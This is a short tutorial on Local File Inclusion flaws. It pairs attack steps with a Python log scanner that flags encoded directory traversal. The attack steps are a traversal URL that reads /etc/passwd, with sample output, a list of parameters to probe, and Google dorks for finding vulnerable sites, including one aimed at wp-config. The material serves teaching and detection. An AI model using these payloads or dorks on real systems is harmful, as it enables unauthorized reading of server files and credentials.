LFI (Local File Inclusion)

Local file inclusion (also known as LFI) is the inclusion of files that are already present on the server by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal sequences (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, keep in mind that it is also common in other technologies such as JSP, ASP and others. [1]

Example of test:

Consider the URL

 http://vulnerable_host/preview.php?file=example.html

The parameter file= could be exploited to point to another file on the server:

 http://vulnerable_host/preview.php?file=../../../../etc/passwd

The expected result is shown below:

 root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 alex:x:500:500:alex:/home/alex:/bin/bash
 margo:x:501:501::/home/margo:/bin/bash
 ...

The following is a list of the most common parameters to test for LFI:

 ?cat=
 ?dir=
 ?action=
 ?board=
 ?date=
 ?detail=
 ?file=
 ?download=
 ?path=
 ?folder=
 ?prefix=
 ?include=
 ?page=
 ?inc=
 ?locate=
 ?show=
 ?doc=
 ?site=
 ?type=
 ?view=
 ?content=
 ?document=
 ?layout=
 ?mod=
 ?conf=
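
The same parameter list is useful for detection. The following is an added example, not part of the original post: it scans web access log lines for directory traversal sequences in those parameters, including percent-encoded and double-encoded forms. The log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the list above.
WATCHED = {"cat", "dir", "action", "board", "date", "detail", "file", "download",
           "path", "folder", "prefix", "include", "page", "inc", "locate", "show",
           "doc", "site", "type", "view", "content", "document", "layout", "mod", "conf"}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style.
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(log_line):
    """Return [(param, decoded_value)] for watched parameters carrying ../ segments."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        if name.lower() in WATCHED and TRAVERSAL.search(value):
            hits.append((name, value))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /preview.php?file=example.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /preview.php?file=../../../../etc/passwd HTTP/1.1" 200 1301',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=%252e%252e%252fconfig HTTP/1.1" 404 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /blog.php?cat=news..2024 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, value in find_traversal(line):
            print(f"traversal in ?{param}= -> {value!r}")
```

A hit that was answered with status 200 and an unusually large response, like the second sample line, deserves priority review because the included file may have been returned.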

You can use Google Hacking and dorks to find vulnerable targets like:

 inurl:"wp-license.php?file=../..//wp-config"

File containing passwords and directory traversal vulnerability [2]

Using the same strategy used to exploit WordPress and retrieve the wp-config, you could take all the parameters above and create your own Google Hacking dork to analyze your target.

 inurl:"?cat=" site:"example.com" 

References:

[1] OWASP - LFI

[2] GHDB

Thanks for following!